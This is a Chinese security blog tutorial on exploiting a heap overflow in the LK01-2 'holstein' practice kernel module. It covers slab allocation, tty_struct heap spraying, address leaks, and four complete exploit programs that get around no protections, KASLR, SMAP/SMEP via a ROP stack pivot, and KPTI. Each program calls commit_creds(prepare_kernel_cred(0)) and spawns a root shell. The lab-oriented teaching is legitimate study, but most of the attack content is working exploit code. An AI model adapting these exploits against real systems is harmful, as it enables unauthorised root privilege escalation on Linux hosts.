Linux内核之堆溢出的利用

2023-09-13 17:05:00

![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

前言
==

用户进程会通过`malloc`等函数进行动态内存分配相应的内核也有一套动态的内存分配机制。

内核中的内存分配
========

有两种类型的计算机并且使用不同的方法管理物理内存

*   UMA计算机：每个处理器访问内存的速度一直
    
*   NUMA计算机：每个处理器访问自己的本地内存速度较快，但是访问其他处理器的本地内存会相对较慢
    

![image-20230907122806131](https://image.3001.net/images/20230913/1694595901_65017b3d509bcb86d9e4b.png)

首先将内存划为为结点，每个结点与一个处理器进行关联，因此上图的与处理器关联的内存都被视作为结点。结点使用`pg_data_t`结构体进行表示。并且结点与结点之间是通过链表进行链接的。

结点进一步划分为多个域，域使用`zone_type`枚举类型表示。

![image-20230907123642772](https://image.3001.net/images/20230913/1694595902_65017b3e3a36a7d60bf96.png)

域进一步细化为页为单位的内存进行划分。页则使用`page`数据结构进行表示。

![image-20230907123900682](https://image.3001.net/images/20230913/1694595903_65017b3f1be331fad7b0e.png)

虽然内核中使用了伙伴算法对页框进行管理，但是由于页的单位一般是4096，倘若只想申请部分内存，但是直接分配一页的大小会浪费资源。因此内核使用了`slab`分配器进行小内存的分配。

【----帮助网安学习，以下所有学习资料免费领！加vx：yj009991，备注“freebuf”获取！】

① 网安学习成长路径思维导图  
② 60+网安经典常用工具包  
③ 100+SRC漏洞分析报告  
④ 150+网安攻防实战技术电子书  
⑤ 最权威CISSP 认证考试指南+题库  
⑥ 超1800页CTF实战技巧手册  
⑦ 最新网安大厂面试题合集（含答案）  
⑧ APP客户端安全检测指南（安卓+IOS）

图片来自[https://blog-wohin-me.translate.goog/posts/pawnyable-0202/?\_x\_tr\_sl=auto&\_x\_tr\_tl=en&\_x\_tr\_hl](https://blog-wohin-me.translate.goog/posts/pawnyable-0202/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl)，`slab`大致流程如下。

![image-20230907132658581](https://image.3001.net/images/20230913/1694595904_65017b4007133a16f7c6e.png)

`slab`不仅仅是作为分配器还有缓存的功能，因此在使用`kmalloc`时会首先检索`kmem_cache`是否存在空闲的内存，这一点与用户态下的`ptmalloc`很相似。

LK01-2
======

**项目地址**:[https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-2/LK01-2](https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-2/LK01-2)

**module\_open**

在执行`open`模块时会使用`kmalloc`进行动态内存分配，因此会使用到上述所说的`slab`分配器。

static int module\_open(struct inode \*inode, struct file \*file)  
{  
printk(KERN\_INFO "module\_open called\\n");  
​  
g\_buf = kmalloc(BUFFER\_SIZE, GFP\_KERNEL);  
if (!g\_buf) {  
printk(KERN\_INFO "kmalloc failed");  
return -ENOMEM;  
}  
​  
return 0;  
}

**module\_read**

在执行`read`模块时会从内核堆地址中拷贝信息到用户空间中去，但是这里的拷贝没有对长度做限制，因此存在着越界读的漏洞。

static ssize\_t module\_read(struct file \*file,  
char \_\_user \*buf, size\_t count,  
loff\_t \*f\_pos)  
{  
printk(KERN\_INFO "module\_read called\\n");  
​  
if (copy\_to\_user(buf, g\_buf, count)) {  
printk(KERN\_INFO "copy\_to\_user failed\\n");  
return -EINVAL;  
}  
​  
return count;  
}

**module\_write**

在执行`write`模块时会将用户空间的数据拷贝到内核堆空间中，由于没有做长度的限制，因此存在着内核堆溢出的漏洞。

static ssize\_t module\_write(struct file \*file,  
const char \_\_user \*buf, size\_t count,  
loff\_t \*f\_pos)  
{  
printk(KERN\_INFO "module\_write called\\n");  
​  
if (copy\_from\_user(g\_buf, buf, count)) {  
printk(KERN\_INFO "copy\_from\_user failed\\n");  
return -EINVAL;  
}  
​  
return count;  
}

堆溢出的利用
------

由于内核分配动态内存是通过`slab`分配器，`slab`分配器会优先从缓存中取出，题目给会通过`open`模块分配一个`0x400`的堆块。因此会从`kmalloc-1024`中取出堆块。可以看到`0x400`的堆块能够写入超过`0x400`的数据。但是这种堆溢出不会影响程序正常执行。这是因为紧接着的堆块没有存储函数指针。

![image-20230907173253844](https://image.3001.net/images/20230913/1694595905_65017b412bb854538eff8.png)

因此如果需要劫持程序的执行流程，则需要使得存在一个堆块内部存放着函数指针并且在构造的堆块的后方。而内核的许多重要的结构体都是通过堆进行分配，而且这些结构体需要经常创建与释放，因此这些结构体也会通过`kmalloc-1024`中取出堆块。因此在内核堆块的利用需要熟悉内核中一些包含函数指针的对象的大小。而`tty_struct`的结构体的大小刚好处于`kmalloc-1024`的范围内。

struct tty\_struct {  
int magic;  
struct kref kref;  
struct device \*dev; /\* class device or NULL (e.g. ptys, serdev) \*/  
struct tty\_driver \*driver;  
const struct tty\_operations \*ops;  
...  
} \_\_randomize\_layout;

可以看到`tty_struct`结构体会存在`ops`的操作指针，对`tty`的操作都会调用该函数指针。

[https://ptr--yudai-hatenablog-com.translate.goog/entry/2020/03/16/165628?\_x\_tr\_sl=auto&\_x\_tr\_tl=en&\_x\_tr\_hl=zh-CN](https://ptr--yudai-hatenablog-com.translate.goog/entry/2020/03/16/165628?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=zh-CN)中统计了一下常用的结构体。

由于我们不清楚在执行`open`模块的时候分配的堆块是否会在`tty`结构体的上方，因此需要使用堆喷将`tty`结构体充满在`open`模块申请的堆块的附近。

int spray\[100\];  
for (int i = 0; i < 50; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
int fd = open("/dev/holstein", O\_RDWR);  
for (int i = 50; i < 100; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);

*   `ptmx`文件是用于打开伪终端主设备文件，该文件则是通过上述的`tty`结构体进行表示
    
*   `O_NOCTTY`则是用于防止当前进程将打开的终端设备作为其控制终端
    

对过上述操作在能使得`open`模块操作分配的堆空间是在`tty`结构体所分配的空间的周围的。如下图所示能够看到将`tty`结构体分配在`g_buf`（`open`模块分配的堆块）的下方

![image-20230907182112183](https://image.3001.net/images/20230913/1694595906_65017b427065508631c84.png)

该操作指针中存放着许多函数地址

![image-20230907182134256](https://image.3001.net/images/20230913/1694595907_65017b439d1e434567a9f.png)

将该结构体覆盖为无效值

![image-20230907182207217](https://image.3001.net/images/20230913/1694595908_65017b44a2c8cca62f014.png)

通过`ioctl`操作触发函数指针

ioctl(spray\[i\], 0x1234, 0x1234);

`ioctl`是一个用于在Linux系统中进行设备控制和配置的系统调用，它允许用户态程序与设备驱动程序进行通信以进行各种操作。因此执行`ioctl`函数实际是会调用`ops`指向的函数表。但是接着执行内核并不会发生崩溃，这里我猜测是在`ioctl`函数执行流程中会检测`ops`指针的有效性。

但是单单修改函数表内的函数地址，则会引起崩溃。

![image-20230907201410965](https://image.3001.net/images/20230913/1694595909_65017b45bdb84ef6a07dc.png)

崩溃地址正是我们修改的值。

![image-20230907191028514](https://image.3001.net/images/20230913/1694595911_65017b4713e894d53c658.png)

因此梳理一下针对该题堆溢出利用的条件

1.  利用堆喷使得漏洞堆块处于`tty`结构体堆块的上方
    
2.  利用堆溢出将`ops`指针修改为可控的内核堆地址并在该地址中填充函数地址
    

没有开启保护
------

经过测试，在没有开启kaslr的情况下`g_buf`对应的堆地址也是会改变的，因此需要进行泄露计算出`g_buf`的地址。由于`g_buf`处于内核地址，因此可以触发`ioctl`，这里我使用了用户空间的堆块地址，但是无法触发，因此猜测`ioctl`需要检验`ops`指针值是否为内核地址。

并且在`tty`结构体中存储了堆块的地址，因此可以通过越界读泄露堆地址。

![image-20230907202942771](https://image.3001.net/images/20230913/1694595912_65017b48b0351a0eadda0.png)

通过`read`模块泄露堆地址

...  
char buf\[0x500\];  
read(fd, buf, 0x500);  
unsigned long \* p = (unsigned long \*)&buf;  
for (int i = 0; i < 0xa0; i++)  
printf("\[0x%x\] 0x%lx\\n",i ,p\[i\]);  
...

这里需要注意的是我们尽可能选择与`g_buf`地址相近的堆地址，因为`slab`分配器会分配连续的内存，因此在附近的地址可以计算出真正的偏移。

![image-20230908112306592](https://image.3001.net/images/20230913/1694595913_65017b49e15a3cad47a76.png)

泄露出堆地址后还需要解决一个问题是`ioctl`函数会执行函数表的哪个函数指针，因此我们需要劫持`ops`指针为`g_buf`，然后在`g_buf`填充有规律的垃圾数据，判断函数指针的位置。

...  
unsigned long heap = p\[0x9f\];  
printf("heap:0x%lx\\n", heap);  
unsigned long g\_buf = heap - 0x4f8 ;  
printf("g\_buf:0x%lx\\n", g\_buf);  
for (unsigned long i = 0; i < 0x80; i++)  
p\[i\] = i;  
\*(unsigned long \*)&buf\[0x418\] = g\_buf;  
write(fd, buf, 0x500);  
for (int i = 0; i < 100; i++) {  
ioctl(spray\[i\], 0xdeadbeef, 0xcafebabe);  
}    
...

可以看到在函数表中的偏移为`0xc`，该地址填充的值会被用作处理`ioctl`函数的操作。

![image-20230908114137510](https://image.3001.net/images/20230913/1694595915_65017b4b63e26e408804c.png)

由于题目没有开启任何保护，接下来就是`ret2usr`即可

### run.sh

#!/bin/sh  
qemu-system-x86\_64 \\  
\-m 64M \\  
\-nographic \\  
\-kernel bzImage \\  
\-append "console=ttyS0 loglevel=3 oops=panic panic=-1 nosmap nosemp nokaslr nopti" \\  
\-no-reboot \\  
\-cpu qemu64 \\  
\-smp 1 \\  
\-monitor /dev/null \\  
\-initrd initramfs.cpio.gz\\  
\-net nic,model=virtio \\  
\-net user \\  
\-s

### exp

这里需要对所有伪终端执行`ioctl`操作，这是因为我们不能判断具体覆盖了哪个`tty`的结构体。

#include <stdio.h>  
#include <ctype.h>  
#include <fcntl.h>  
#include <unistd.h>  
#include <sys/stat.h>  
#include <string.h>  
#include <stdlib.h>  
​  
/\*  
0xffffffff81074650 T prepare\_kernel\_cred  
0xffffffff810744b0 T commit\_creds  
\*/  
​  
unsigned long user\_cs, user\_sp, user\_ss, user\_rflags;  
void save\_user\_land()  
{  
\_\_asm\_\_(  
".intel\_syntax noprefix;"  
"mov user\_cs, cs;"  
"mov user\_sp, rsp;"  
"mov user\_ss, ss;"  
"pushf;"  
"pop user\_rflags;"  
".att\_syntax;"  
);  
puts("\[\*\] Saved userland registers");  
printf("\[#\] cs: 0x%lx \\n", user\_cs);  
printf("\[#\] ss: 0x%lx \\n", user\_ss);  
printf("\[#\] rsp: 0x%lx \\n", user\_sp);  
printf("\[#\] rflags: 0x%lx \\n\\n", user\_rflags);  
}  
​  
​  
void backdoor()  
{  
printf("\*\*\*\*getshell\*\*\*\*");  
system("id");  
system("/bin/sh");  
}  
​  
unsigned long user\_rip = (unsigned long)backdoor;  
​  
void lpe()  
{  
\_\_asm(  
".intel\_syntax noprefix;"  
"movabs rax, 0xffffffff81074650;" //prepare\_kernel\_cred  
"xor rdi, rdi;"  
"call rax;" //prepare\_kernel\_cred(0);  
"mov rdi, rax;"  
"mov rax, 0xffffffff810744b0;" //commit\_creds  
"call rax;"  
"swapgs;"     
"mov r15, user\_ss;"  
"push r15;"  
"mov r15, user\_sp;"  
"push r15;"  
"mov r15, user\_rflags;"  
"push r15;"  
"mov r15, user\_cs;"  
"push r15;"  
"mov r15, user\_rip;"  
"push r15;"  
"iretq;"  
".att\_syntax;"  
);  
}  
​  
​  
int main() {  
save\_user\_land();  
int spray\[100\];  
for (int i = 0; i < 50; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
int fd = open("/dev/holstein", O\_RDWR);  
for (int i = 50; i < 100; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
char buf\[0x500\];  
read(fd, buf, 0x500);  
unsigned long \* p = (unsigned long \*)&buf;  
//for (int i = 0; i < 0xa0; i++)  
//printf("\[0x%x\] 0x%lx\\n",i ,p\[i\]);  
unsigned long heap = p\[0x9f\];  
printf("heap:0x%lx\\n", heap);  
unsigned long g\_buf = heap - 0x4f8 ;  
printf("g\_buf:0x%lx\\n", g\_buf);  
p\[0xc\] = lpe;  
\*(unsigned long \*)&buf\[0x418\] = g\_buf;  
write(fd, buf, 0x500);  
for (int i = 0; i < 100; i++) {  
ioctl(spray\[i\], 0xdeadbeef, 0xcafebabe);  
}          
}

开启KASLR
-------

### run.sh

#!/bin/sh  
qemu-system-x86\_64 \\  
\-m 64M \\  
\-nographic \\  
\-kernel bzImage \\  
\-append "console=ttyS0 loglevel=3 oops=panic panic=-1 nosmap nosemp nopti kaslr" \\  
\-no-reboot \\  
\-cpu qemu64 \\  
\-smp 1 \\  
\-monitor /dev/null \\  
\-initrd initramfs.cpio.gz\\  
\-net nic,model=virtio \\  
\-net user \\  
\-s

### exp

开启`KASLR`的解法与没开启保护的情况基本一致，只需要多泄露一个内核地址即可。

#include <stdio.h>  
#include <ctype.h>  
#include <fcntl.h>  
#include <unistd.h>  
#include <sys/stat.h>  
#include <string.h>  
#include <stdlib.h>  
​  
​  
#define prepare\_kernel\_cred\_offset 0x74650  
#define commit\_creds\_offset 0x744b0  
​  
unsigned long kernel\_base;  
unsigned long prepare\_kernel\_cred;  
unsigned long commit\_creds;  
​  
unsigned long user\_cs, user\_sp, user\_ss, user\_rflags;  
void save\_user\_land()  
{  
\_\_asm\_\_(  
".intel\_syntax noprefix;"  
"mov user\_cs, cs;"  
"mov user\_sp, rsp;"  
"mov user\_ss, ss;"  
"pushf;"  
"pop user\_rflags;"  
".att\_syntax;"  
);  
puts("\[\*\] Saved userland registers");  
printf("\[#\] cs: 0x%lx \\n", user\_cs);  
printf("\[#\] ss: 0x%lx \\n", user\_ss);  
printf("\[#\] rsp: 0x%lx \\n", user\_sp);  
printf("\[#\] rflags: 0x%lx \\n\\n", user\_rflags);  
}  
​  
​  
void backdoor()  
{  
printf("\*\*\*\*getshell\*\*\*\*");  
system("id");  
system("/bin/sh");  
}  
​  
unsigned long user\_rip = (unsigned long)backdoor;  
​  
void lpe()  
{  
prepare\_kernel\_cred = kernel\_base + prepare\_kernel\_cred\_offset;  
commit\_creds = kernel\_base + commit\_creds\_offset;  
\_\_asm(  
".intel\_syntax noprefix;"  
"movabs rax, prepare\_kernel\_cred;" //prepare\_kernel\_cred  
"xor rdi, rdi;"  
"call rax;" //prepare\_kernel\_cred(0);  
"mov rdi, rax;"  
"mov rax, commit\_creds;" //commit\_creds  
"call rax;"  
"swapgs;"     
"mov r15, user\_ss;"  
"push r15;"  
"mov r15, user\_sp;"  
"push r15;"  
"mov r15, user\_rflags;"  
"push r15;"  
"mov r15, user\_cs;"  
"push r15;"  
"mov r15, user\_rip;"  
"push r15;"  
"iretq;"  
".att\_syntax;"  
);  
}  
​  
​  
int main() {  
save\_user\_land();  
int spray\[100\];  
for (int i = 0; i < 50; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
int fd = open("/dev/holstein", O\_RDWR);  
for (int i = 50; i < 100; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
char buf\[0x500\];  
read(fd, buf, 0x500);  
unsigned long \* p = (unsigned long \*)&buf;  
//for (int i = 0; i < 0xa0; i++)  
//  printf("\[0x%x\] 0x%lx\\n",i ,p\[i\]);  
unsigned long heap = p\[0x9f\];  
printf("heap:0x%lx\\n", heap);  
unsigned long g\_buf = heap - 0x4f8 ;  
printf("g\_buf:0x%lx\\n", g\_buf);  
unsigned long kernel\_addr = p\[0x83\];  
printf("kernel\_addr:0x%lx\\n", kernel\_addr);  
kernel\_base = kernel\_addr - 0xc38880;  
printf("kernel\_base:0x%lx\\n", kernel\_base);  
p\[0xc\] = lpe;  
\*(unsigned long \*)&buf\[0x418\] = g\_buf;  
write(fd, buf, 0x500);  
for (int i = 0; i < 100; i++) {  
ioctl(spray\[i\], 0xdeadbeef, 0xcafebabe);  
}         
}

开启SMAP与SMEP
-----------

`SMAP`与`SMEP`会防止内核访问与执行用户空间的地址，但是由于该题本身是修改在堆块内的指针值无法在堆块内部构造ROP链，那么想要执行ROP链那么需要将栈迁移到堆上。但是由于我们的输入不在栈上，而是在堆上，无法通过`pop rbp;ret;`与`mov rsp,rbp`去修改栈顶值。这里需要注意到，当通过`ioctl`函数时，我们的参数值实际也会被传递进去。如下图所示。

![image-20230908134614606](https://image.3001.net/images/20230913/1694595917_65017b4d0f8daf657255e.png)

因此需要通过根据这几个寄存器修改栈顶的操作

cat g | grep -E "push rdx;.\* pop rsp;.\* ret"

![image-20230908135835922](https://image.3001.net/images/20230913/1694595918_65017b4e1c62aae24c507.png)

该`gadget`可以将`rax`的值移动到`rdi`的值，但是需要经过`rep movsq qword ptr [rdi], qword ptr [rsi]; ret;`，该汇编语言实际是循环将`rsi`指向的值存放到`rdi`中，并且循环此为由`rcx`寄存器指定，因此将`rcx`寄存器设置为0即可跳过该操作。

![image-20230908173447236](https://image.3001.net/images/20230913/1694595919_65017b4f2b269b33d9731.png)

### run.sh

#!/bin/sh  
qemu-system-x86\_64 \\  
\-m 64M \\  
\-nographic \\  
\-kernel bzImage \\  
\-append "console=ttyS0 loglevel=3 oops=panic panic=-1  nopti kaslr" \\  
\-no-reboot \\  
\-cpu qemu64,+smap,+smep \\  
\-smp 1 \\  
\-monitor /dev/null \\  
\-initrd initramfs.cpio.gz\\  
\-net nic,model=virtio \\  
\-net user \\  
\-s

### exp

#include <stdio.h>  
#include <ctype.h>  
#include <fcntl.h>  
#include <unistd.h>  
#include <sys/stat.h>  
#include <string.h>  
#include <stdlib.h>  
​  
/\*  
0xffffffff810d748d: pop rdi; ret;   
0xffffffff81022dff: iretq; pop rbp; ret;  
0xffffffff8162668e: swapgs; ret;  
0xffffffff813a478a: push rdx; mov ebp, 0x415bffd9; pop rsp; pop r13; pop rbp; ret;  
0xffffffff8162707b: mov rdi, rax; rep movsq qword ptr \[rdi\], qword ptr \[rsi\]; ret;  
0xffffffff8109c39e: pop rsi; ret;  
0xffffffff8113c1c4: pop rcx; ret;  
\*/  
​  
#define prepare\_kernel\_cred\_offset 0x74650  
#define commit\_creds\_offset 0x744b0  
#define pop\_rdi\_offset 0xd748d  
#define iretq\_pop\_rbp\_offset 0x22dff  
#define push\_rax\_ret\_offset 0x24819   
#define push\_rdx\_pop\_rsp\_ret\_offset 0x3a478a  
#define mov\_rdi\_rax\_ret\_offset 0x62707b  
#define swapgs 0x62668e  
#define pop\_rsi 0x9c39e  
#define pop\_rcx 0x13c1c4  
​  
unsigned long kernel\_base;  
unsigned long prepare\_kernel\_cred;  
unsigned long commit\_creds;  
unsigned long user\_cs, user\_sp, user\_ss, user\_rflags;  
​  
void save\_user\_land()  
{  
\_\_asm\_\_(  
".intel\_syntax noprefix;"  
"mov user\_cs, cs;"  
"mov user\_sp, rsp;"  
"mov user\_ss, ss;"  
"pushf;"  
"pop user\_rflags;"  
".att\_syntax;"  
);  
puts("\[\*\] Saved userland registers");  
printf("\[#\] cs: 0x%lx \\n", user\_cs);  
printf("\[#\] ss: 0x%lx \\n", user\_ss);  
printf("\[#\] rsp: 0x%lx \\n", user\_sp);  
printf("\[#\] rflags: 0x%lx \\n\\n", user\_rflags);  
}  
​  
​  
void backdoor()  
{  
printf("\*\*\*\*getshell\*\*\*\*");  
system("id");  
system("/bin/sh");  
}  
​  
​  
int main() {  
save\_user\_land();  
int spray\[100\];  
for (int i = 0; i < 50; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
int fd = open("/dev/holstein", O\_RDWR);  
for (int i = 50; i < 100; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
char buf\[0x500\];  
read(fd, buf, 0x500);  
unsigned long \* p = (unsigned long \*)&buf;  
//for (int i = 0; i < 0xa0; i++)  
//  printf("\[0x%x\] 0x%lx\\n",i ,p\[i\]);  
unsigned long heap = p\[0x9f\];  
printf("heap:0x%lx\\n", heap);  
unsigned long g\_buf = heap - 0x4f8 ;  
printf("g\_buf:0x%lx\\n", g\_buf);  
unsigned long kernel\_addr = p\[0x83\];  
printf("kernel\_addr:0x%lx\\n", kernel\_addr);  
kernel\_base = kernel\_addr - 0xc38880;  
printf("kernel\_base:0x%lx\\n", kernel\_base);  
p\[0x22\] = pop\_rdi\_offset + kernel\_base;  
p\[0x23\] = 0;  
p\[0x24\] = prepare\_kernel\_cred\_offset + kernel\_base;  
p\[0x25\] = pop\_rcx + kernel\_base;  
p\[0x26\] = 0;  
p\[0x27\] = mov\_rdi\_rax\_ret\_offset + kernel\_base;  
p\[0x28\] = commit\_creds\_offset + kernel\_base;  
p\[0x29\] = swapgs + kernel\_base;  
p\[0x2a\] = iretq\_pop\_rbp\_offset + kernel\_base;  
p\[0x2b\] = (unsigned long)backdoor;  
p\[0x2c\] = user\_cs;  
p\[0x2d\] = user\_rflags;  
p\[0x2e\] = user\_sp;  
p\[0x2f\] = user\_ss;      
\*(unsigned long \*)&buf\[0x418\] = g\_buf;  
p\[0xc\] = p\[0xc\] = kernel\_base + push\_rdx\_pop\_rsp\_ret\_offset;  
write(fd, buf, 0x500);  
for (int i = 0; i < 100; i++) {  
ioctl(spray\[i\], g\_buf+0x100, g\_buf+0x100);  
}         
}

开启kpti
------

### run.sh

#!/bin/sh  
qemu-system-x86\_64 \\  
\-m 64M \\  
\-nographic \\  
\-kernel bzImage \\  
\-append "console=ttyS0 loglevel=3 oops=panic panic=-1  kpti=1  kaslr" \\  
\-no-reboot \\  
\-cpu qemu64,+smap,+smep \\  
\-smp 1 \\  
\-monitor /dev/null \\  
\-initrd initramfs.cpio.gz\\  
\-net nic,model=virtio \\  
\-net user \\  
\-s

### exp

`kpti`的绕过也与普通的一致，使用`swapgs_restore_regs_and_return_to_usermode`的`gadget`即可

#include <stdio.h>  
#include <ctype.h>  
#include <fcntl.h>  
#include <unistd.h>  
#include <sys/stat.h>  
#include <string.h>  
#include <stdlib.h>  
​  
/\*  
0xffffffff810d748d: pop rdi; ret;   
0xffffffff81022dff: iretq; pop rbp; ret;  
0xffffffff8162668e: swapgs; ret;  
0xffffffff813a478a: push rdx; mov ebp, 0x415bffd9; pop rsp; pop r13; pop rbp; ret;  
0xffffffff8162707b: mov rdi, rax; rep movsq qword ptr \[rdi\], qword ptr \[rsi\]; ret;  
0xffffffff8109c39e: pop rsi; ret;  
0xffffffff8113c1c4: pop rcx; ret;  
0xffffffff81800e10 T swapgs\_restore\_regs\_and\_return\_to\_usermode  
\*/  
​  
#define prepare\_kernel\_cred\_offset 0x74650  
#define commit\_creds\_offset 0x744b0  
#define pop\_rdi\_offset 0xd748d  
#define iretq\_pop\_rbp\_offset 0x22dff  
#define push\_rax\_ret\_offset 0x24819   
#define push\_rdx\_pop\_rsp\_ret\_offset 0x3a478a  
#define mov\_rdi\_rax\_ret\_offset 0x62707b  
#define swapgs 0x62668e  
#define pop\_rsi 0x9c39e  
#define pop\_rcx 0x13c1c4  
#define swapgs\_restore\_regs\_and\_return\_to\_usermode 0x800e10  
​  
unsigned long kernel\_base;  
unsigned long prepare\_kernel\_cred;  
unsigned long commit\_creds;  
unsigned long user\_cs, user\_sp, user\_ss, user\_rflags;  
​  
void save\_user\_land()  
{  
\_\_asm\_\_(  
".intel\_syntax noprefix;"  
"mov user\_cs, cs;"  
"mov user\_sp, rsp;"  
"mov user\_ss, ss;"  
"pushf;"  
"pop user\_rflags;"  
".att\_syntax;"  
);  
puts("\[\*\] Saved userland registers");  
printf("\[#\] cs: 0x%lx \\n", user\_cs);  
printf("\[#\] ss: 0x%lx \\n", user\_ss);  
printf("\[#\] rsp: 0x%lx \\n", user\_sp);  
printf("\[#\] rflags: 0x%lx \\n\\n", user\_rflags);  
}  
​  
​  
void backdoor()  
{  
printf("\*\*\*\*getshell\*\*\*\*");  
system("id");  
system("/bin/sh");  
}  
​  
​  
int main() {  
save\_user\_land();  
int spray\[100\];  
for (int i = 0; i < 50; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
int fd = open("/dev/holstein", O\_RDWR);  
for (int i = 50; i < 100; i++)  
spray\[i\] = open("/dev/ptmx", O\_RDONLY | O\_NOCTTY);  
char buf\[0x500\];  
read(fd, buf, 0x500);  
unsigned long \* p = (unsigned long \*)&buf;  
//for (int i = 0; i < 0xa0; i++)  
//  printf("\[0x%x\] 0x%lx\\n",i ,p\[i\]);  
unsigned long heap = p\[0x9f\];  
printf("heap:0x%lx\\n", heap);  
unsigned long g\_buf = heap - 0x4f8 ;  
printf("g\_buf:0x%lx\\n", g\_buf);  
unsigned long kernel\_addr = p\[0x83\];  
printf("kernel\_addr:0x%lx\\n", kernel\_addr);  
kernel\_base = kernel\_addr - 0xc38880;  
printf("kernel\_base:0x%lx\\n", kernel\_base);  
p\[0x22\] = pop\_rdi\_offset + kernel\_base;  
p\[0x23\] = 0;  
p\[0x24\] = prepare\_kernel\_cred\_offset + kernel\_base;  
p\[0x25\] = pop\_rcx + kernel\_base;  
p\[0x26\] = 0;  
p\[0x27\] = mov\_rdi\_rax\_ret\_offset + kernel\_base;  
p\[0x28\] = commit\_creds\_offset + kernel\_base;  
p\[0x29\] = swapgs\_restore\_regs\_and\_return\_to\_usermode + kernel\_base + 0x16;  
p\[0x2a\] = 0;  
p\[0x2b\] = 0;  
p\[0x2c\] = (unsigned long)backdoor;  
p\[0x2d\] = user\_cs;  
p\[0x2e\] = user\_rflags;  
p\[0x2f\] = user\_sp;  
p\[0x30\] = user\_ss;      
\*(unsigned long \*)&buf\[0x418\] = g\_buf;  
p\[0xc\] = p\[0xc\] = kernel\_base + push\_rdx\_pop\_rsp\_ret\_offset;  
write(fd, buf, 0x500);  
for (int i = 0; i < 100; i++) {  
ioctl(spray\[i\], g\_buf+0x100, g\_buf+0x100);  
}         
}

**更多网安技能的在线实操练习，[请点击这里>>](https://www.hetianlab.com/)**

  

\# 漏洞利用 \# 堆溢出 \# Linux内核